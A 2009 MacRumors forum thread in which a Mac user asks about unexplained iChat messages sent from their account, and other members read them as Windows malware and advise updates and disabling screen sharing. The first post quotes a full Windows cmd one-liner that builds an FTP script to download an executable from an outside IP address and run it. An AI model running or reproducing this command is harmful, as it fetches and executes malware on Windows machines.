Mac = Zombie machine? Windows command line?

Discussion in 'Community Discussion' started by spaceboots06, Sep 14, 2009.

  1. spaceboots06 macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #1
    Hello everyone!

    I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

    %systemroot%\system32\cmd.exe

    del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq

    j

    These three messages were sent by me! To my friend! I don't even know what they mean. I know they have something to do with windows machines, and I know that del means delete, so I'm still trying to figure out what's going on. Something with the command line I assume.

    Anyway, could this be something to do with zombie machines or whatever? I have no idea what is going on. I would have put this in Mac help, but it seems as if this could also be a Windows problem too. No idea.

    Help!

    Thanks.

    Edit: Oh, yeah. Now Software Update wants me to update iTunes, QuickTime, Java and Security Update 2009-005. Should I do it?
     
  2. barr08 macrumors 65816

    barr08

    Joined:
    Aug 9, 2006
    Location:
    Boston, MA
    #2
    Do you use VNC or any remote desktop utility?
     
  3. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #3
    That is not Mac (darwin) command line, that is Windows command line.
    How it happened, I don't know.

    Yes, update everything in Software Updater.
     
  4. spaceboots06 thread starter macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #4
    I have Jaadu VNC for my iPhone, allowing me to view my screen and control my screen from my iPhone, but it wasn't enabled. I also use a password on the screen sharing setting on my computer! I'm in a techy university right now, so could someone may have cracked the password or something and used my computer? Wouldn't they have tried to do more damage then they already attempted to do? Should I reformat my computer? I'm pretty bugged out right now.
     
  5. Zombie Acorn macrumors 65816

    Zombie Acorn

    Joined:
    Feb 2, 2009
    Location:
    Toronto, Ontario
    #5
    Definitely weird. May have been a hi-jack attempt. Obviously you aren't going to have a system32 folder since you are on a mac.

    It looks like its trying to install win32bit.exe into your system32 folder which is normally the location most viruses etc locate themselves.
     
  6. electroshock macrumors 6502a

    electroshock

    Joined:
    Sep 7, 2009
    #6
    Definitely!!! ALWAYS stay on top of patches, since they usually contains critical security fixes.

    It looks like you may have hit malware somewhere. Fortunately, it's a Windows-based malware so it had no effect on your Mac. It appears to connect to a server in Chile to download an actual Windows executable that then probably takes over a victim Windows PC. I don't think it actually ran in your case.

    Of more concern to me was that it found a way to get onto your Mac. I suspect you may have possibly browsed somewhere that delivered hidden malware. Happened to NYtimes.com users last weekend (for example).

    So best defense is to apply all updates, reboot, and make sure your antivirus definitions is up to date, too.
     
  7. spaceboots06 thread starter macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #7
    Alright, cool. No immediate damage done, seeing that the messages that were sent came from and went to Mac machines.

    My question is though, where could this have came from? Did I download a bad program? Is my Screen Sharing thingy vulnerable? Any ideas? I'm about to disable Screen Sharing right now.

    Yeah! That's what's freaking me out!!! This dumb chick told me to download this file sharing program called Shakes Peer and I listened. I think that's what the problem is, even though I only used it for about five minutes. Either that, or Screen Sharing.

    I'm still very surprised that this was the only thing that happened, and that I'm not missing any files or there are no little prank things that the typical hacker person would do.
     
  8. mags631 Guest

    Joined:
    Mar 6, 2007
    #8
    Please tell me your chat response was something like:
     
  9. iShater macrumors 604

    iShater

    Joined:
    Aug 13, 2002
    Location:
    Chicagoland
    #9
    Are you sure it was coming from YOUR end? not something the other side accidentally pasted in the screen?
     
  10. spaceboots06 thread starter macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #10
    Hahahahaha, sadly, no.

    It was coming from my end. I asked "WTF?" when I came back to the computer and the person said that they ignored the "gibberish." They thought nothing of it.
     

Share This Page